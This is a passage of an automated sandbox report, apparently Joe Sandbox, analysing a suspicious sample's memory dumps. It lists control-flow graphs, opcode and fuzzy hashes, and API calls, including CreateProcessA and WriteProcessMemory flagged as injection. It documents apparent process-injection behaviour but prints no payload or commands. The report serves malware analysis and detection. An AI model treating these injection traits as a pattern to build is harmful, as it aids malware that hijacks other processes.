541 6f9f240-6f9f24d 535->541 540->541 546 6f9f21e 540->546 547 6f9f25c-6f9f265 541->547 548 6f9f24f-6f9f259 541->548 546->535 573 6f9f3ca 572->573 574 6f9f3cc-6f9f3ce 572->574 573->571 574->571
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: (iq$Hiq$Hiq$Hiq$Hiq$Hiq$Hiq$PHeq
                • API String ID: 0-201796279
                • Opcode ID: f18f4bb29d2eb319506244ebf53eb0909e5fc5b36d3fed83c4a96c65a1a699e2
                • Instruction ID: 950c8dbe145488065a5b2f303bd94c3eeaa5f0fecdeae6f4bc9afac3b3774ad6
                • Opcode Fuzzy Hash: f18f4bb29d2eb319506244ebf53eb0909e5fc5b36d3fed83c4a96c65a1a699e2
                • Instruction Fuzzy Hash: 9872D071B002148FDB88EB78C85566E7BA6EFC8310F248569E10ADB3E5DE34DD46C7A1
                Function 06F6AEF8 Relevance: 6.9, Strings: 5, Instructions: 621COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 575 6f6aef8-6f6b6f0 578 6f6b6f6-6f6b6fb 575->578 579 6f6bbd3-6f6bc3c 575->579 578->579 580 6f6b701-6f6b71e 578->580 587 6f6bc43-6f6bccb 579->587 586 6f6b724-6f6b728 580->586 580->587 588 6f6b737-6f6b73b 586->588 589 6f6b72a-6f6b734 call 6f6af08 586->589 633 6f6bcd6-6f6bd56 587->633 590 6f6b73d-6f6b747 call 6f6af08 588->590 591 6f6b74a-6f6b751 588->591 589->588 590->591 596 6f6b757-6f6b787 591->596 597 6f6b86c-6f6b871 591->597 607 6f6bf56-6f6bf68 596->607 610 6f6b78d-6f6b860 call 6f6af14 * 2 596->610 600 6f6b873-6f6b877 597->600 601 6f6b879-6f6b87e 597->601 600->601 604 6f6b880-6f6b884 600->604 605 6f6b890-6f6b8c0 call 6f6af20 * 3 601->605 604->607 608 6f6b88a-6f6b88d 604->608 605->633 634 6f6b8c6-6f6b8c9 605->634 619 6f6bf82-6f6bf8a 607->619 620 6f6bf6a-6f6bf7c 607->620 608->605 610->597 642 6f6b862 610->642 628 6f6bf8f-6f6bf94 619->628 629 6f6bf7e-6f6bf81 620->629 630 6f6bf8c 620->630 629->619 630->628 650 6f6bd5d-6f6bddf 633->650 634->633 637 6f6b8cf-6f6b8d1 634->637 637->633 640 6f6b8d7-6f6b90c 637->640 649 6f6b912-6f6b91b 640->649 640->650 642->597 651 6f6b921-6f6b97b call 6f6af20 * 2 call 6f6af30 * 2 649->651 652 6f6ba7e-6f6ba82 649->652 654 6f6bde7-6f6be69 650->654 698 6f6b98d 651->698 699 6f6b97d-6f6b986 651->699 652->654 655 6f6ba88-6f6ba8c 652->655 660 6f6be71-6f6be9e 654->660 659 6f6ba92-6f6ba98 655->659 655->660 663 6f6ba9c-6f6bad1 659->663 664 6f6ba9a 659->664 673 6f6bea5-6f6bf25 660->673 669 6f6bad8-6f6bade 663->669 664->669 672 6f6bae4-6f6baec 669->672 669->673 677 6f6baf3-6f6baf5 672->677 678 6f6baee-6f6baf2 672->678 731 6f6bf2c-6f6bf4e 673->731 683 6f6bb57-6f6bb5d 677->683 684 6f6baf7-6f6bb1b 677->684 678->677 689 6f6bb5f-6f6bb7a 683->689 690 6f6bb7c-6f6bbaa 683->690 717 6f6bb24-6f6bb28 684->717 718 6f6bb1d-6f6bb22 684->718 709 6f6bbb2-6f6bbbe 689->709 690->709 701 6f6b991-6f6b993 698->701 699->701 705 6f6b988-6f6b98b 699->705 707 6f6b995 701->707 708 6f6b99a-6f6b99e 701->708 705->701 707->708 714 6f6b9a0-6f6b9a7 708->714 715 6f6b9ac-6f6b9b2 708->715 730 6f6bbc4-6f6bbd0 709->730 709->731 720 6f6ba49-6f6ba4d 714->720 721 6f6b9b4-6f6b9ba 715->721 722 6f6b9bc-6f6b9c1 715->722 717->607 725 6f6bb2e-6f6bb31 717->725 724 6f6bb34-6f6bb45 718->724 728 6f6ba4f-6f6ba69 720->728 729 6f6ba6c-6f6ba78 720->729 732 6f6b9c7-6f6b9cd 721->732 722->732 767 6f6bb47 call 6f6bff0 724->767 768 6f6bb47 call 6f6bfdf 724->768 725->724 728->729 729->651 729->652 731->607 736 6f6b9d3-6f6b9d8 732->736 737 6f6b9cf-6f6b9d1 732->737 743 6f6b9da-6f6b9ec 736->743 737->743 740 6f6bb4d-6f6bb55 740->709 744 6f6b9f6-6f6b9fb 743->744 745 6f6b9ee-6f6b9f4 743->745 750 6f6ba01-6f6ba08 744->750 745->750 754 6f6ba0e 750->754 755 6f6ba0a-6f6ba0c 750->755 758 6f6ba13-6f6ba1e 754->758 755->758 759 6f6ba42 758->759 760 6f6ba20-6f6ba23 758->760 759->720 760->720 762 6f6ba25-6f6ba2b 760->762 763 6f6ba32-6f6ba3b 762->763 764 6f6ba2d-6f6ba30 762->764 763->720 766 6f6ba3d-6f6ba40 763->766 764->759 764->763 766->720 766->759 767->740 768->740
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID:
                • String ID: Hiq$Hiq$Hiq$Hiq$Hiq
                • API String ID: 0-1376665358
                • Opcode ID: b008b47e0747c465b41baf3b6bcbb288a8e7094f57bda95005b24d7705da034a
                • Instruction ID: c11f74d23494e9122d6c3f20aadd2143aee76aa0daf10058dddea802bd7dbfee
                • Opcode Fuzzy Hash: b008b47e0747c465b41baf3b6bcbb288a8e7094f57bda95005b24d7705da034a
                • Instruction Fuzzy Hash: 01326170E102588FDB94DFA9C8507AEBBF2EF85300F14816AE40AEB395DB349D55CB91
                Function 06F92106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1190 6f92106-6f9210a 1191 6f9210b-6f92120 1190->1191 1192 6f92acd-6f92adf 1190->1192 1191->1192 1193 6f92121-6f9212c 1191->1193 1195 6f92132-6f9213e 1193->1195 1196 6f9214a-6f92159 1195->1196 1198 6f921b8-6f921bc 1196->1198 1199 6f921c2-6f921cb 1198->1199 1200 6f92264-6f922ce 1198->1200 1201 6f921d1-6f921e7 1199->1201 1202 6f920c6-6f920d2 1199->1202 1200->1192 1238 6f922d4-6f9281b 1200->1238 1208 6f92239-6f9224b 1201->1208 1209 6f921e9-6f921ec 1201->1209 1202->1192 1204 6f920d8-6f920e4 1202->1204 1206 6f9215b-6f92161 1204->1206 1207 6f920e6-6f920fa 1204->1207 1206->1192 1210 6f92167-6f9217f 1206->1210 1207->1206 1217 6f920fc-6f92105 1207->1217 1218 6f92a0c-6f92ac2 1208->1218 1219 6f92251-6f92261 1208->1219 1209->1192 1212 6f921f2-6f9222f 1209->1212 1210->1192 1221 6f92185-6f921ad 1210->1221 1212->1200 1235 6f92231-6f92237 1212->1235 1217->1190 1218->1192 1221->1198 1235->1208 1235->1209 1316 6f9281d-6f92827 1238->1316 1317 6f92832-6f928c5 1238->1317 1318 6f9282d 1316->1318 1319 6f928d0-6f92963 1316->1319 1317->1319 1320 6f9296e-6f92a01 1318->1320 1319->1320 1320->1218
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: D
                • API String ID: 0-2746444292
                • Opcode ID: d503d180ba3ad735c65516ece1c7f7f1b0b3bcc8be5ab455c660566569593eff
                • Instruction ID: a3dcf9b6931eef59f5d4fc4a6a46cba58cb45e5b88c5543c2d89438595b2fc8d
                • Opcode Fuzzy Hash: d503d180ba3ad735c65516ece1c7f7f1b0b3bcc8be5ab455c660566569593eff
                • Instruction Fuzzy Hash: B652BC74A112199FCB54DF68D899A9EBBB2FF89300F1041D9D50AA7365CB34AEC1CF50
                Function 06F8EA05 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8EC46
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: e867ad34c07370e6ef477260a003d9dbb8ae902c1e59ba1b8345338be1e9910e
                • Instruction ID: 8ecfd1d6e699d1baefbfc5bb27c336144d5233266df3394d67921ea30c9a6d5f
                • Opcode Fuzzy Hash: e867ad34c07370e6ef477260a003d9dbb8ae902c1e59ba1b8345338be1e9910e
                • Instruction Fuzzy Hash: C3A15971D002198FEF64DF68C841BEEBBB2FF48314F1485AAE819A7240DB749985CF91
                Function 06F96CE8 Relevance: .7, Instructions: 668COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4a136222f8071b5c3e5a34c3ef45e98edd3da79c6beb5d041eea83511a13c565
                • Instruction ID: 3163faa020e27b5537596473d3fb37166c4d55179048c86f44caed7e9e0b484a
                • Opcode Fuzzy Hash: 4a136222f8071b5c3e5a34c3ef45e98edd3da79c6beb5d041eea83511a13c565
                • Instruction Fuzzy Hash: BE524970A10604CFDB95EF68C588A5DB7F2FF89314F6585A8E40A9B361DB30ED86CB50
                Function 06F621B0 Relevance: .6, Instructions: 553COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b0323d3219d19fe00734c528fda9daab1b894d20f6e477baddaa1ae8e77b3fe3
                • Instruction ID: 68a7e914c99a78430d7d8fe6fee8c3f3e44b3a5d2b077a4e9fbe595f00203265
                • Opcode Fuzzy Hash: b0323d3219d19fe00734c528fda9daab1b894d20f6e477baddaa1ae8e77b3fe3
                • Instruction Fuzzy Hash: 50421D70E0071A8FCB55DF69C8506EDF7B1FF89300F1486AAD459AB255EB30AA85CF90
                Function 06F82338 Relevance: .5, Instructions: 511COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 13f6834f782f1fbbf1f8340d495a7b216fbd04dc5cf77a9b335473e7475048e7
                • Instruction ID: a540f3a6f542cd5e1ce21130eedcd11be92c2ad7ef0f49ac841f23061b9a9054
                • Opcode Fuzzy Hash: 13f6834f782f1fbbf1f8340d495a7b216fbd04dc5cf77a9b335473e7475048e7
                • Instruction Fuzzy Hash: C2427C74E01229CFDB64DFA9C994B9DBBB2BF48300F1481A9E909A7355D730AE81CF51
                Function 06F81069 Relevance: .5, Instructions: 487COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fb3a89259c4f96f6c8d47797fe3fd6bdec753baed4c06962c025d7a4f711b526
                • Instruction ID: 252ac885ab1c9ad859797d5ef7b0b36d14582f361faf654a7f2ec6cd7dae75aa
                • Opcode Fuzzy Hash: fb3a89259c4f96f6c8d47797fe3fd6bdec753baed4c06962c025d7a4f711b526
                • Instruction Fuzzy Hash: 9432C170D01219CFDB90DFA9C584A8EFBB2BF49351F55D295D448AB221CB34E986CFA0
                Function 06F623F0 Relevance: .4, Instructions: 375COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0e365b9f2e29a97a95d3ede394d58133089085f4d8469481f9ec8adcb1f38251
                • Instruction ID: 36664323eba375d6a5a77bdf7ce608cf798405314fa5acd88a616471f9386cc1
                • Opcode Fuzzy Hash: 0e365b9f2e29a97a95d3ede394d58133089085f4d8469481f9ec8adcb1f38251
                • Instruction Fuzzy Hash: EE12C875D1071A8FCB54DF69C880AD9F7B1BF99300F15C6AAD859A7211EB70AAC4CF80
                Function 06F96CD8 Relevance: .3, Instructions: 294COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ea0b516022ca62b9d9842fc19c1f7a5c0d41533a90ed8d0d525f2fdbdea2978
                • Instruction ID: aa2ef9b33df0a47d5bd846f1596ef7870306bd08464d69d4cc64b07c543f7c02
                • Opcode Fuzzy Hash: 1ea0b516022ca62b9d9842fc19c1f7a5c0d41533a90ed8d0d525f2fdbdea2978
                • Instruction Fuzzy Hash: 4AD1E434A10205CFEB95DF69C988E98B7F2FF44315F6981A9E4099B261DB30EC86CF50
                Function 06F6B6B8 Relevance: .3, Instructions: 278COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 04b4a31c19344f4a3ad52b91e55ec3654ff6e52aaf761cc8ad13e73aa9984f14
                • Instruction ID: cb17e1a2607479e17d1686a4e4e1461bdc1ffec81372ed1cae5bac01f5b0b439
                • Opcode Fuzzy Hash: 04b4a31c19344f4a3ad52b91e55ec3654ff6e52aaf761cc8ad13e73aa9984f14
                • Instruction Fuzzy Hash: 1AC16C71E002188FDF94CFA6D88079EBBB2EF85300F14C1AAE809AB255DB70D995CF51
                Function 0119703A Relevance: .2, Instructions: 190COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 318b9c668ece3995f93abb81942aa06d5e54caf844ede5ccdf0bb7fd28df2bfd
                • Instruction ID: f546bd1bea1e8487aa48e41fa0e823b3b9ad2676928b63d94eca7823aecadade
                • Opcode Fuzzy Hash: 318b9c668ece3995f93abb81942aa06d5e54caf844ede5ccdf0bb7fd28df2bfd
                • Instruction Fuzzy Hash: FC81A3B4E012189FDF05DFA9D894A9DBBF2FF88300F14806AE519AB365DB346946CF50
                Function 01193E34 Relevance: .2, Instructions: 187COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ca9c4b1b53f9e3fe180545de8be92a82c7a989168f8a5b8a62c0836b8bde6c46
                • Instruction ID: c9a1410cf06ec1b78ddae44aaa318056f996c9523e1bcc215566ec8b2c28f22b
                • Opcode Fuzzy Hash: ca9c4b1b53f9e3fe180545de8be92a82c7a989168f8a5b8a62c0836b8bde6c46
                • Instruction Fuzzy Hash: 9881A4B4E002189FDF15DFA9D854A9EBBF2FF88300F14806AE519AB365DB346946CF50
                Function 07D70040 Relevance: .2, Instructions: 157COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2201724138.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7d70000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 46a61e1b1153390b8ed7171c37666f69f152522f7488d9bffa38e23f0a71e37e
                • Instruction ID: 69e241c7723aebe3ce0f985a72994df69a18e2ae79e2bd8fea0782b3dd39f6f0
                • Opcode Fuzzy Hash: 46a61e1b1153390b8ed7171c37666f69f152522f7488d9bffa38e23f0a71e37e
                • Instruction Fuzzy Hash: A66129B1D042198FEB68CF66CC007E9FBB6BF8A300F14D1AAD44DA6251EB705A85CF40
                Function 06F8918A Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99066d99e3f27fa01ece0bf4ebe464dfb3132be7381233f0b1b14bfefdbffdfe
                • Instruction ID: c12fd24092d10ecec804a4feee0f56b11d0971f5d48941710458538951d9f677
                • Opcode Fuzzy Hash: 99066d99e3f27fa01ece0bf4ebe464dfb3132be7381233f0b1b14bfefdbffdfe
                • Instruction Fuzzy Hash: 0D21E2B1D056188FEB18CF6BC8446EEBBF7AFC9300F04C4AAD519A6264EB700945CE90
                Function 06F9D570 Relevance: 2.8, Strings: 2, Instructions: 308COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 923 6f9d570-6f9d57c 924 6f9d559-6f9d56a 923->924 925 6f9d57e-6f9d5b6 923->925 929 6f9d979-6f9d9a4 925->929 930 6f9d5bc-6f9d5cf 925->930 942 6f9d9ab-6f9d9fb 929->942 933 6f9d5d1-6f9d5db 930->933 934 6f9d5e3-6f9d609 930->934 933->934 934->942 943 6f9d60f-6f9d625 call 6f9cd34 934->943 973 6f9d9fd-6f9da09 942->973 974 6f9da1c-6f9da24 942->974 947 6f9d62b-6f9d645 943->947 948 6f9d707-6f9d70b 943->948 955 6f9d65d-6f9d679 947->955 956 6f9d647-6f9d655 947->956 950 6f9d71b-6f9d72b call 6f9cd44 948->950 951 6f9d70d-6f9d713 948->951 958 6f9d72d-6f9d756 950->958 959 6f9d762-6f9d780 call 6f9cd54 950->959 951->950 970 6f9d67b-6f9d686 955->970 971 6f9d6d6-6f9d6fa 955->971 956->955 969 6f9d785-6f9d79c call 6f9a3b8 959->969 983 6f9d79e-6f9d7ac 969->983 984 6f9d7b4-6f9d7d0 969->984 979 6f9d688-6f9d68e 970->979 980 6f9d69e-6f9d6af 970->980 987 6f9d6fc 971->987 988 6f9d704 971->988 990 6f9da11 973->990 985 6f9d690 979->985 986 6f9d692-6f9d694 979->986 993 6f9d6b1-6f9d6b4 980->993 994 6f9d6b6-6f9d6b9 980->994 983->984 997 6f9d7d2-6f9d7dd 984->997 998 6f9d844-6f9d868 984->998 985->980 986->980 987->988 988->948 990->974 996 6f9d6bc-6f9d6d4 993->996 994->996 996->970 996->971 1002 6f9d7df-6f9d7e5 997->1002 1003 6f9d7f5-6f9d802 997->1003 1010 6f9d86a 998->1010 1011 6f9d872 998->1011 1006 6f9d7e9-6f9d7eb 1002->1006 1007 6f9d7e7 1002->1007 1008 6f9d804-6f9d810 1003->1008 1009 6f9d816-6f9d842 call 6f93b64 1003->1009 1006->1003 1007->1003 1008->1009 1009->997 1009->998 1010->1011 1011->929
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2200746487.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f90000_x.jbxd
                Similarity
                • API ID:
                • String ID: PHeq$PHeq
                • API String ID: 0-3382621680
                • Opcode ID: c747bac238965ffac059c053daf6c34ffaee946342d9f1b58608cceb1cf70d7b
                • Instruction ID: 4cb41772df1d852979059029fe86fe928bfe442ae6837ea431406139edf4d70b
                • Opcode Fuzzy Hash: c747bac238965ffac059c053daf6c34ffaee946342d9f1b58608cceb1cf70d7b
                • Instruction Fuzzy Hash: 0BC10675B00604CFDB54DF68D994AADBBF2FF89310B2545A8E416AB3A1DB31EC41CB60
                Function 06F8EA10 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8EC46
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 0f74728e0dea3a1a5426308636ad6af99c2c7f3707c46fa080c60b46223080f9
                • Instruction ID: a6560af1f655cd1499ce6cf4a97299f668dc974241d05262c3c4e20a68b8d848
                • Opcode Fuzzy Hash: 0f74728e0dea3a1a5426308636ad6af99c2c7f3707c46fa080c60b46223080f9
                • Instruction Fuzzy Hash: 63914871D003198FEB64DF68C841BEEBBB2FF48314F1485AAE819A7250DB749985CF91
                Function 0119B298 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0119B4FE
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: bd4d8b897a93a884e10c28758b477c319aaac50a355bee14e0ed36d8689a5848
                • Instruction ID: 8018d842b0aaa584ae49973f038ad74597c594e78a8b095004e5235508ba6aba
                • Opcode Fuzzy Hash: bd4d8b897a93a884e10c28758b477c319aaac50a355bee14e0ed36d8689a5848
                • Instruction Fuzzy Hash: 1C816AB0A04B058FDB29DF29E441B5ABBF1FF88304F00892DD45ADBA51D734E94ACB95
                Function 01195AA4 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b9eed322ecf2bcf7b883de5d3b8d97348d9ee1dab49b8cfaa5700b72a4726e58
                • Instruction ID: 953637ba9abf1b540ae3e32119d82d9d7b480270e731c9daf5a810c26a9ed75b
                • Opcode Fuzzy Hash: b9eed322ecf2bcf7b883de5d3b8d97348d9ee1dab49b8cfaa5700b72a4726e58
                • Instruction Fuzzy Hash: 9A41BFB18053488FDF5ACFA8C8447EDBFB2EF46314F54818AC02A7B251D779A90ACB15
                Function 0119592D Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 011959E9
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 18b21b674fe3296c294e15a5c51a2e53789cfb63ce1244c5634ff581790c6902
                • Instruction ID: 6e3dbb6fa0179e3c3995daa2255cdd2e3691984c7ea2e8e377146a16d5f86886
                • Opcode Fuzzy Hash: 18b21b674fe3296c294e15a5c51a2e53789cfb63ce1244c5634ff581790c6902
                • Instruction Fuzzy Hash: 2841DEB1C00719CFDB24DFA9C884A9DBBB6BF49304F24806AD418AB251DB75694ACF90
                Function 01194508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 011959E9
                Memory Dump Source
                • Source File: 00000005.00000002.2197628622.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_1190000_x.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 6fc0132f0560c1114f60d64b7c375a345933f034a44215ac1479fe232ace2b40
                • Instruction ID: 2bc3754f75b8ebe954996a9740e1c888651cc4e3c02c3c9ea7dca8b0ecf8dc9c
                • Opcode Fuzzy Hash: 6fc0132f0560c1114f60d64b7c375a345933f034a44215ac1479fe232ace2b40
                • Instruction Fuzzy Hash: D141F2B0C00719CBDB28DFA9C844B9DBBF6BF49304F24816AD418BB251DB75694ACF90
                Function 06F6BFF0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 77884927280073755a9841a376b4295992fcb6af92ec265f77cd2a5c6aa8935f
                • Instruction ID: 67960657e1a97226e86d1c6d41b18c1e75c98d1e2bd4028ad8ac80ff53da6e83
                • Opcode Fuzzy Hash: 77884927280073755a9841a376b4295992fcb6af92ec265f77cd2a5c6aa8935f
                • Instruction Fuzzy Hash: 43315A72904389AFCB12DFA9D844ADEBFF8EF09310F14805AF954A7261C7359854DFA1
                Function 06F6A2B9 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06F6A357
                Memory Dump Source
                • Source File: 00000005.00000002.2200657568.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f60000_x.jbxd
                Similarity
                • API ID: DrawText
                • String ID:
                • API String ID: 2175133113-0
                • Opcode ID: 6d3df3987faae3928387cb316b53ab69bf21931f6120b53b29101fee7d6231a1
                • Instruction ID: 05fd5bf22a530b0234d3f199252f3c252adde031fa2261222e2bffbb775ea371
                • Opcode Fuzzy Hash: 6d3df3987faae3928387cb316b53ab69bf21931f6120b53b29101fee7d6231a1
                • Instruction Fuzzy Hash: F931E0B5D012099FDB10CF9AD885ADEFBF9FB48320F14842EE819A7210D775A940CFA0
                Function 06F8E781 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                Download Yara Rule
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F8E818
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: fde7edfdf1c8d3e0d5077189066ae7bec63c7168eb99415a3a854da697ab7ae3
                • Instruction ID: e3aab435e32750c36c12421bb9ee48da8ac5d3785b059c71b5f8837bc1dd6e82
                • Opcode Fuzzy Hash: fde7edfdf1c8d3e0d5077189066ae7bec63c7168eb99415a3a854da697ab7ae3
                • Instruction Fuzzy Hash: 9F215575D003499FCB10DFA9C984BEEBBF5FF48320F10842AE918A7241C778A940CBA0
                Function 06F8E788 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                Download Yara Rule
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F8E818
                Memory Dump Source
                • Source File: 00000005.00000002.2200716482.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6f80000_x.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: bc8c523304f588ed2509a7eee6e60ba5e98a84467e18797b3f4ab4146c03b7a5
                • Instruction ID: b388b068de4b17b6329b17519b4a086ce81f232a05e2ab58cd135563449c5837
